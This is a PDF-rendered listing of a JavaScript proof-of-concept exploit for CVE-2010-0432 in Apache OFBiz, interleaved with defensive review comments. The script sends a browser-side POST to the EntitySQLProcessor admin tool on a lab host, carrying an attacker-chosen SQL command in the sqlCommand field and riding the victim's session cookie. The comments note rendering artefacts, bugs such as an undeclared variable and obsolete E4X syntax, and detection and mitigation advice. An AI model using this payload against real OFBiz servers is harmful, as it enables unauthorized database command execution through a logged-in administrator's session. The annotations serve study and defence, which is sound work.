
Apache OFBiz SQL Remote Execution PoC Payload

  1    /*
  2
  3    Apache OFBiz SQL Remote Execution PoC Payload.
  4
  5    CVE: CVE−2010−0432
  6
  7    By: Lucas Apa ( lucas −at− bonsai−sec.com ).
  8
  9    Bonsai Information Security
  10
  11   http://www.bonsai−sec.com/
  12
  13   */
       // Review notes (defensive reading of this listing):
       // - This is a PDF rendering, not source: the inline gutter numbers, the typographic
       //   quotes (’) and U+2212 minus signs where ASCII hyphens belong, and the URL literal
       //   split across two lines at the open() call are extraction artefacts.
       // - The header comment ties the script to CVE-2010-0432 (Apache OFBiz). The request
       //   built below is a form POST to the /webtools/control/EntitySQLProcessor admin
       //   tool with a caller-supplied SQL string in the sqlCommand field, sent with the
       //   browser's current document.cookie — i.e. it rides an existing OFBiz session.
  14
       // Placeholder for the SQL text; it is spliced into the sqlCommand form field
       // below (see post_data = str1+cmd+str2).
  15   var cmd = ’command’;
  16
       // Acquire a request object: legacy MSXML ActiveX progids first, then the standard
       // XMLHttpRequest, then the non-standard window.createRequest. Every failure path
       // leaves xmlhttp === false, and nothing afterwards checks for that before open().
  17   var xmlhttp=false;
  18   try {
  19   xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  20   } catch (e) {
  21   try {
  22   xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
  23   } catch (E) {
  24   xmlhttp = false;
  25   }
  26   }
  27
  28   if (!xmlhttp && typeof XMLHttpRequest!=’undefined’) {
  29   try {
  30   xmlhttp = new XMLHttpRequest();
  31   } catch (e) {
  32   xmlhttp=false;
  33   }
  34   }
  35   if (!xmlhttp && window.createRequest) {
  36   try {
  37   xmlhttp = window.createRequest();
  38   } catch (e) {
  39   xmlhttp=false;
  40   }
  41   }
  42
       // Asynchronous POST to the OFBiz EntitySQLProcessor webtool on a lab host
       // (192.168.225.135:8443). As rendered, the URL string literal is broken across
       // the next two lines.
  43   xmlhttp.open("POST", "
  44   https://192.168.225.135:8443/webtools/control/EntitySQLProcessor",true);
       // Response handler. xmlhttp2 is never declared anywhere in this listing, and the
       // only statement inside the branch is commented out, so the response is ignored.
  45   xmlhttp.onreadystatechange=function() {
  46   if (xmlhttp2.readyState==4) {
  47   //alert(xmlhttp.responseText)
  48   }
  49   }
  50
       // Reads the page's document.cookie and copies it into a "cookie" request header.
       // Defensive notes: an HttpOnly flag on the OFBiz session cookie keeps it out of
       // document.cookie, and conforming browsers refuse "cookie" as a script-set
       // request header (it is a forbidden header name for XMLHttpRequest).
  51   var cookie = unescape(document.cookie);
  52   xmlhttp.setRequestHeader("content−type",
       // --- page break in the PDF rendering: the two lines below are page footer/header ---
Lucas Apa                                                                         04/16/2010
                            Apache OFBiz SQL Remote Execution PoC Payload            Page 2/2
  53   "application/x−www−form−urlencoded");
  54   xmlhttp.setRequestHeader("cookie", cookie);
       // E4X XML literals (<r><![CDATA[...]]></r>) serve as raw-string delimiters for the
       // two halves of the form body. E4X was a Firefox-only extension that has since been
       // removed, so these lines do not parse in current engines. Form fields carried:
       // submitButton=Enviar, sqlCommand=<cmd>, group=org.ofbiz, rowLimit=200.
       // Detection/mitigation: a browser-originated POST to
       // /webtools/control/EntitySQLProcessor carrying a sqlCommand parameter is a
       // high-signal event; access to /webtools/ should be limited to administrators and,
       // where possible, to trusted networks.
  55   var str1 = (<r><![CDATA[submitButton=Enviar&sqlCommand=]]></r>).toString();
  56   var str2 = (<r><![CDATA[&group=org.ofbiz&rowLimit=200]]></r>).toString();
  57   var post_data = str1+cmd+str2;
       // Sends the assembled body; the result is never inspected.
  58   xmlhttp.send(post_data);





				